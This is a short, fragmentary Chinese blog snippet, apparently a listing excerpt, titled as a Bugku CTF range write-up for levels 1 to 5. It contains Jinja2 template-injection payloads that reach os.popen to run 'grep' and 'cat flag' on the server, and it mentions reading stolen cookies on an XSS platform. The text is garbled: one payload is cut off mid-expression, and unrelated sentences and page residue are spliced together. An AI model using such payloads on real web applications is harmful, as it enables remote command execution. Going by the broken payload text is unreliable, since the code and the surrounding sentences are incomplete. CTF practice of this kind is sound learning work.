【bugku靶场 1 至 5 关】持续更新ing。。。
flag={{config.__class__.__init__.__globals__['os'].popen('grep -r flag{ ./').read()}}_builtins__['eval']("__import__('os').popen('cat flag').read()")}}访问admin.php使用管理员账号密码登录,然后查看xss平台的cookie,看到了flag字样,但好像被编码了。这句话的意思是:“给我这个文件,我将通过 Python 为您返回运行结果!
原创
2024-07-30 20:46:52 ·
405 阅读 ·
0 评论